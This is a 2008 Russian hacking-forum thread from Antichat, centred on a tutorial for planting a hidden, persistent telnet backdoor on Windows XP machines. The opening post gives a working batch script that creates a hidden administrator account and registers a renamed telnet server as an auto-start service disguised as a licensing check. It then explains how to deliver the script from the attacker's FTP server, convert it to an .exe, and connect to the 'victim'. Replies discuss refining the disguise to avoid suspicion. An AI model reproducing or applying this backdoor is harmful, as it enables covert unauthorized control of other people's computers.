Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Скрытый telnet доступ к Windows |

04.09.2008, 22:01
|
|
Постоянный
Регистрация: 19.02.2008
Сообщений: 438
Провел на форуме: 956872
Репутация:
186
|
|
Скрытый telnet доступ к Windows
Скрытый telnet доступ к Windows
]INTRO[
Данная статья предназначена для пользователей умеющих пользоваться консолью и знающих о telnet'е. Всё приведйнное ниже тестилось на машинах под управлением операционной системы Windows XP SP2.
]MENU[
1,2. Для тех, кто имеет доступ к машине.
2. Для впаривающих.
3. Развязка
]START[
1. Нам нужно паписать батник, в котором прописываются все параметры будущего телнета.
Вот собсно и он, run.bat (в архиве):
chcp 1251
net user SUPPORT_388945a0 /delete
net user SUPPORT_388945a0 pas /add
net localgroup "Администраторы" SUPPORT_388945a0 /add
net localgroup "Пользователи" SUPPORT_388945a0 /del
copy /y "%SYSTEMROOT%/system32\tlntsvr.exe" "%SYSTEMROOT%/system32\tlntsevr.exe"
ECHO Windows Registry Editor Version 5.00>>user.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t]>>user.reg
ECHO "SUPPORT_388945a0"=dword:00000000>>user.reg
regedit /s user.reg && DEL user.reg
sc create "Microsoft Network" binpath= %windir%\system32\tlntsevr.exe type= own start= auto displayname= "Проверка подлинности Microsoft Windows" error= ignore depend= RPCSS/TCPIP/NTLMSSP
sc description "Microsoft Network" "Удостоверяет, что ваш компьютер использует лицензионное программное обеспечение."
tlntadmn config port=1451 sec=-NTLM
net start "Проверка подлинности Microsoft Windows"
Расшифровываю:
chcp 1251 - переходим на 1251 кодировку, без этого не как, иначе нужно будет перекодировать в досовскую кодировку, например группа "Администраторы" будет такова "Ђ¤¬Ё*Ёбва*в®ал".
net user SUPPORT_388945a0 /delete - удаляем стандартного скрытого юзверя.
net user SUPPORT_388945a0 pas /add - добавляем его-же, только каплю подделаем его под себя. pas - вместо этого нужно ввести пароль.
net localgroup "Администраторы" SUPPORT_388945a0 /add - добавляем юзверя SUPPORT_388945a0 в группу "Администраторы".
net localgroup "Пользователи" SUPPORT_388945a0 /del - удаляем узверя SUPPORT_388945a0 из группы "Пользователи" (когда мы создали пользователя он присвоил себе группу пользователей, а когда мы присвоили ему группу админов, он просто стал учавствовать в обеих группах).
copy /y "%SYSTEMROOT%/system32\tlntsvr.exe" "%SYSTEMROOT%/system32\tlntsevr.exe" - Берёт стандартный файл сервера tlntsvr.exe, копирует его в ту же директорию, только уже под другим именем (tlntsevr.exe).
ECHO Windows Registry Editor Version 5.00>>user.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t]>>user.reg
ECHO "SUPPORT_388945a0"=dword:00000000>>user.reg
regedit /s user.reg && DEL user.reg - изменение реестра, сначала воспроизводится написанное, за тем импортируется в реестр. SUPPORT_388945a0 - данный юзверь сдесь скрывается от посторонних глаз, т.е. не будет отображаться во время входа в систему, при просмотре пользователей через панель управления и т.д. (конец в ветке "UserList" без пробелов! почему-то исправляется...).
sc create "Microsoft Network" binpath= %windir%\system32\tlntsevr.exe type= own start= auto displayname= "Служба доступа к сети Microsoft" error= ignore depend= RPCSS/TCPIP/NTLMSSP - создаём службу, %windir%\system32\tlntsevr.exe - путь до файла сервера телнета, "Проверка подлинности Microsoft Windows" - название службы.
sc description "Microsoft Network" "Удостоверяет, что ваш компьютер использует лицензионное программное обеспечение." - её описание.
tlntadmn config port=1451 sec=-NTLM - порт 1451
net start "Проверка подлинности Microsoft Windows" - старт службы
2. Вот мы зашли на машину через некий telnet или его подобие, переходим в любую директорию. На своей машине запускаем ftp сервер, например Pablos ftp server (в архиве), переходим во вкладку User Accounts, там всё интуетивно понятно, указываем дынные для конекта.
В консили переходим в нужную директорию, за тем пишем:
------------
Способ 1.
------------
ftp
open 111.111.111.111
SUPPORT_388945a0
pas
get run.bat
bye
"run.bat"
ftp - угадайте что
open 111.111.111.111 - открыть ип 111.111.111.111 (ваш ип).
SUPPORT_388945a0 - логин пользователя.
pas - пароль.
get run.bat - отправить наш батник.
bye - выйти из ftp
"run.bat" - запустить батник (при нужде вводим путь).
------------
Способ 2. Тут нам вообще не нужен ftp и вообще на много меньше мороки, но всеравно, попробуйте и первым способом.
------------
Копируем код батника, маус 2 в консоли, волшебный пункт "Вставить" (у кого-то Past  ), жмём Enter и всё))
Ну да, да...очень сложно... но первый способ всеравно попробуйте))
3. Ну и самое интересное и долгожданное:
Вводим в консоль:
telnet 222.222.222.222 1451
222.222.222.222 - ип жертвы
1451 - порт
Хотя зачем это разъяснять, если вы умееть пользоваться телнетом, но вдруг кто-то уже забыл).
Что бы создать .exe юзаем программу "Bat To Exe Converter" (в архиве).
Архив к статье: http://depositfiles.com/files/7783083 (537.94Kb).
п.с. подобная статья на этой ветке от StG-44 с его взглядом на телнет http://forum.antichat.ru/thread68300.html
Последний раз редактировалось Ru}{eeZ; 07.09.2008 в 18:37..
|
|
|

04.09.2008, 22:55
|
|
Постоянный
Регистрация: 19.10.2007
Сообщений: 794
Провел на форуме: 1013791
Репутация:
711
|
|
Проверка подленности Microsoft Windows
Орфография хромает. Правильно будет писать - подлинности. Вот я если увидел у себя такую надпись, то сразу же почуял бы неладное.
В целом норм.
|
|
|

04.09.2008, 22:57
|
|
Постоянный
Регистрация: 19.02.2008
Сообщений: 438
Провел на форуме: 956872
Репутация:
186
|
|
Сообщение от neprovad
Орфография хромает. Правильно будет писать - подлинности. Вот я если увидел у себя такую надпись, то сразу же почуял бы неладное.
В целом норм.
Исправил)
|
|
|

04.09.2008, 23:08
|
|
Reservists Of Antichat - Level 6
Регистрация: 04.02.2007
Сообщений: 1,152
Провел на форуме: 3008839
Репутация:
1502
|
|
>>>net localgroup "Пользователи" SUPPORT_388945a0 /del - удаляем узверя SUPPORT_388945a0 из группы "Пользователи" (когда мы создали пользователя он присвоил себе группу пользователей, а когда мы присвоили ему группу админов, он просто стал учавствовать в обеих группах).
Вообще глупое действие
__________________
Bedankt euch dafür bei euch selbst.
H_2(S^3/((z1, z2)~(exp(2pi*i/p)z1, exp(2pi*q*i/p)z2)))=Z/pZ
|
|
|

05.09.2008, 05:44
|
|
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
Провел на форуме: 5352530
Репутация:
2062
|
|
Вы что, вообще охр**ели? Уже удалили 3 подобных статьи от Giviona (линк ниже)
Называется, найдите 10 отличий - http://www.hackzona.ru/hz.php?name=News&file=article&sid=8820
|
|
|

05.09.2008, 07:08
|
|
Постоянный
Регистрация: 19.02.2008
Сообщений: 438
Провел на форуме: 956872
Репутация:
186
|
|
Сообщение от Thanat0z
Вы что, вообще охр**ели? Уже удалили 3 подобных статьи от Giviona (линк ниже)
Называется, найдите 10 отличий - http://www.hackzona.ru/hz.php?name=News&file=article&sid=8820
Я эту статью вообще ни коем образом не видел
|
|
|

05.09.2008, 07:12
|
|
Постоянный
Регистрация: 19.02.2008
Сообщений: 438
Провел на форуме: 956872
Репутация:
186
|
|
Сообщение от desTiny
>>>net localgroup "Пользователи" SUPPORT_388945a0 /del - удаляем узверя SUPPORT_388945a0 из группы "Пользователи" (когда мы создали пользователя он присвоил себе группу пользователей, а когда мы присвоили ему группу админов, он просто стал учавствовать в обеих группах).
Вообще глупое действие
Стандартный же юзверь под этим именем не в двух группах учавствует, вот мы и прикроем этого, что бы не вызывать подозрений
|
|
|

05.09.2008, 15:07
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме: 6128108
Репутация:
445
|
|
мля писалось 100 раз
но мне очень нравиться такие статьи подробные! Сам такие примерно пишу на досуге.
Респект вообщем)
Добавляю
Скрытые пользователи храняться тут...... (там все юзеры и админы +еще и скрытые)
C:\WINDOWS\system32\lusrmgr.exe
может кому понадобиться для всяких пакостей)))
|
|
|

05.09.2008, 18:02
|
|
Познающий
Регистрация: 30.10.2007
Сообщений: 63
Провел на форуме: 299216
Репутация:
59
|
|
Сообщение от diznt
C:\WINDOWS\system32\lusrmgr.exe
Во-первых, .msc (не .exe).
Во-вторых, это просто оснастка консоли управления, в ней самой ни черта не хранится.
В-третьих, для сеанса telnet такое не подойдёт.
|
|
|

05.09.2008, 18:22
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме: 6128108
Репутация:
445
|
|
хм..... я сам не знал что это не exe потому что лень смотреть но так все программы обладают exe =-)
Во вторых я имел ввиду что через нее можно все делать с юзерами (ПС вот че ты так придираешься?)
В третих я разве чтото упоминал о телнете???
пздц какой то народ какой пошол
|
|
|
|
 |
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
vtope.net
|
ZEXEL |
Обсуждение Ваших сайтов |
15 |
24.06.2008 17:09 |
|
Полезные ключи реестра.
|
Scofild |
Windows |
6 |
23.04.2008 16:17 |
|
Инет на 2 компе
|
TrypoED |
Аппаратное обеспечение |
15 |
19.03.2008 00:42 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|